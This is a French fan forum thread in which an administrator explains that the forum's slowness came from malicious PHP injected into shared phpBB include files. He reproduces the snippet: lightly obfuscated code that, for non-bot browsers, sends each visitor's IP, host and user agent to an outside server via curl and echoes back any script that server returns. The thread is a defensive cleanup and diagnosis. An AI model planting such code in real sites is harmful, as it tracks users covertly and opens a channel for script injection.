BwataGants.fr https://bwatagants.fr/forum/ |
|
lenteur forum https://bwatagants.fr/forum/viewtopic.php?f=5&t=894 |
Page 2 sur 2 |
Auteur: | joeldc13 [ 18 Jan 2019 22:30 ] |
Sujet du message: | Re: lenteur forum |
Ici ou sur la copie ? J'ai pas touché à la config ici |
Auteur: | Zoreil [ 18 Jan 2019 23:09 ] |
Sujet du message: | Re: lenteur forum |
Oui c'était ça avant : search.php?search_id=active_topics ne fonctionne plus (et le lien n'est plus affiché à côté de "index du forum" |
Auteur: | joeldc13 [ 18 Jan 2019 23:28 ] |
Sujet du message: | Re: lenteur forum |
Ok, je vais regarder. Bon, etant donné que chez scaleway c'est quand meme assez pratique et pas très cher j'ai re-remonté encore une nouvelle copie, un peu plus propre. Les images uploadées fonctionnent, et on est sur un serveur dédié avec 4 CPU x86 et 8 Go de RAM, ce qui est 10* trop pour un forum avec une SGBD de 100Mo. http://51.158.75.52/forum Mais comme vous pourrez le constater, c'est toujours la merde. C'est clairement pas un problème de ressource, le serveur ne fait rien, mais je voulais m'enlever le fait que ce ne soit pas lié à la "petite" config ARM qu'il y avait avant. Par contre j'ai la possibilité de faire des snapshots et des images, donc je vais m'en servir, je vais continuer de bricoler afin d'identifier d'où pourrait venir le soucis, mais c'est clairement pas un pbm de ressource, le serveur ne fait rien. |
Auteur: | joeldc13 [ 18 Jan 2019 23:38 ] |
Sujet du message: | Re: lenteur forum |
Pour les messages non lus, c'est revenu. J'avais en effet désactivé complètement la recherche pour voir si cela provenait de là. |
Auteur: | felinkinkin [ 19 Jan 2019 00:03 ] |
Sujet du message: | Re: lenteur forum |
Merci Joël pour les recherches car bon ça vire à l’arrachage de cheveux. Ça vient des rehost d’image ou lien vers des sites ? |
Auteur: | gloubi [ 19 Jan 2019 00:05 ] |
Sujet du message: | Re: lenteur forum |
Tu as un peu poussé lenTS côté mysql, genre un mysqldumpslow et autre slow query log ? |
Auteur: | joeldc13 [ 19 Jan 2019 00:48 ] |
Sujet du message: | Re: lenteur forum |
C'est bon, le forum est réparé. Rien a voir avec la partie mysql. On avait 4 fichiers qui étaient inclus dans toutes les pages qui avaient un morceau de code malveillant Pour le trouver, je me suis tapé le fichier index.php et j'ai fait du reverse en commentant petit a petit et en voyant a partir de quel moment ça allait vite et j'ai finalement trouvé. Puis j'ai fait un grep sur le curl dans toutes les sources et j'ai trouvé les fichiers contaminés. Code: $wp_fw8676 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_fw8676) && !preg_match ('/bot/i', $wp_fw8676))){ $wp_fw098676="http://"."http"."form".".com/form"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_fw8676); $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_fw098676); curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_8676fw = curl_exec ($ch); curl_close($ch);} if ( substr($wp_8676fw,1,3) === 'scr' ){ echo $wp_8676fw; } Grosso modo, a chaque appel de page, ça allait faire un curl (donc faire un autre appel http) a un autre webserver qui semble etre visiblement http://http.form.com/ en lui passant en parametre notre adresse ip, l'adresse ip du serveur Bref ça allait logger toutes nos connexions sur ce serveur. avec un timeout de 6 secondes. Visiblement, depuis le 10 Janvier, le serveur form.com ne réponds plus et tu coup le curl était en timeout, et donc prennait 6 secondes avant de répondre. D'ou la lenteur. PUTAIN Bon, j'ai checké le forum a été installé en 2013, ce sont les seuls fichiers modifiés en 2014. bref, je suis content d'avoir trouvé, mais ça me saoule un peu qu'on soit passé a cote dé cela pendant autant de temps (bon y a pas d'impact derrière mais quand meme). Je pense qu'il faut qu'on maintiennent un peu plus a jour le forum. Ce que je vous propose : - Basculer sur un serveur dédié chez scaleway, pas un gros mais les petits ARM à 3 euros par mois, ce qui nous permet d'avoir complètement la main sur la machine - en profiter pour se créer des serveurs de "dev" assez facilement sur scaleway (c'est deux clics) - migrer dans les dernières version de phpbb et sécuriser les mots de passe Qu'en pensez vous ? |
Auteur: | felinkinkin [ 19 Jan 2019 09:12 ] |
Sujet du message: | Re: lenteur forum |
MERCI JOEL ! C'est bien plus agréable. je suis d'accord pour ta solution. |
Auteur: | gloubi [ 19 Jan 2019 10:54 ] |
Sujet du message: | Re: lenteur forum |
Bravo pour le reverse. Oui là clairement les mdp peuvent être considérés compromis, donc tout le monde doit le changer et si vous l’utilisez ailleurs avec le même login/mail que sur le forum, faut le changer partout. Il me semble que la branche de phpbb sur laquelle on est n’est plus maintenue, non ? |
Auteur: | Zoreil [ 19 Jan 2019 11:18 ] |
Sujet du message: | Re: lenteur forum |
GG. Ça change la vie |
Auteur: | joeldc13 [ 19 Jan 2019 11:22 ] |
Sujet du message: | Re: lenteur forum |
Alors j'ai bien regardé, il y a vraiment juste ces parties qui ont été modifées, je parlais plus des mot de passe ftp. Dans les parties de code concerné, il n'y a pas les mdp qui transitent, mais tu as raison, par mesure de sécurité il vaut mieux en changer Oui on est en phpbb 3.0 et pas sur la dernière version de cette branche aujourd'hui on est en 3.2.5, sauf que pour migrer en 3.2 il faut d'abord migrer en 3.1 M'occuperai dejà de la bascule sur l'environnement dédié dans la semaine |
Auteur: | gloubi [ 19 Jan 2019 11:34 ] |
Sujet du message: | Re: lenteur forum |
Ce qui est bizarre c’est que form.com c’est une plateforme d’audit, de traçabilité clients et tout ce genre de trucs. Donc pas vraiment un truc de haxxor. Ça pourrait pas genre être overfred qui aurait fait un test en 2014 et oublié de le virer ? |
Auteur: | joeldc13 [ 19 Jan 2019 11:44 ] |
Sujet du message: | Re: lenteur forum |
Alors en fait le curl qui était fait, c'était sur http://httpform.com pardon |
Auteur: | gloubi [ 19 Jan 2019 11:52 ] |
Sujet du message: | Re: lenteur forum |
Ah oui j’avais raté le double point entre form et com |
Auteur: | canaille [ 19 Jan 2019 21:07 ] |
Sujet du message: | Re: lenteur forum |
Ça change la vie, bravo Joël ! |
Auteur: | nicodache [ 20 Jan 2019 15:12 ] |
Sujet du message: | Re: lenteur forum |
Joël for president |
Auteur: | yacco71 [ 20 Jan 2019 15:16 ] |
Sujet du message: | Re: lenteur forum |
Yes merci c’est bien plus agréable !! |
Auteur: | Coyotracker [ 20 Jan 2019 16:08 ] |
Sujet du message: | Re: lenteur forum |
GG Joel. Et merci pour le boulot ! |
Auteur: | Aragorn Le Rouge [ 20 Jan 2019 16:50 ] |
Sujet du message: | Re: lenteur forum |
Merci Joël ! |
Auteur: | Overflow [ 20 Jan 2019 18:17 ] |
Sujet du message: | Re: lenteur forum |
Joël est bô. |
Auteur: | Shooter [ 20 Jan 2019 19:19 ] |
Sujet du message: | Re: lenteur forum |
Si Joël faisait du tennis, on l'appellerait Roger. Mais comme il fait du golf, on peut l'appeler Tiger. Bref, bravo et merci. |
Auteur: | felinkinkin [ 20 Jan 2019 19:59 ] |
Sujet du message: | Re: lenteur forum |
Joel est grand ! |
Auteur: | jayz [ 20 Jan 2019 22:26 ] |
Sujet du message: | Re: lenteur forum |
Attendez de recevoir sa facture avant de trop vous avancer Merci Joël |
Auteur: | ak enemy [ 21 Jan 2019 09:49 ] |
Sujet du message: | Re: lenteur forum |
Cette vivesse du forum Bien joué jojo |
Page 2 sur 2 | Les heures sont au format UTC + 1 heure [ Heure d’été ] |
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |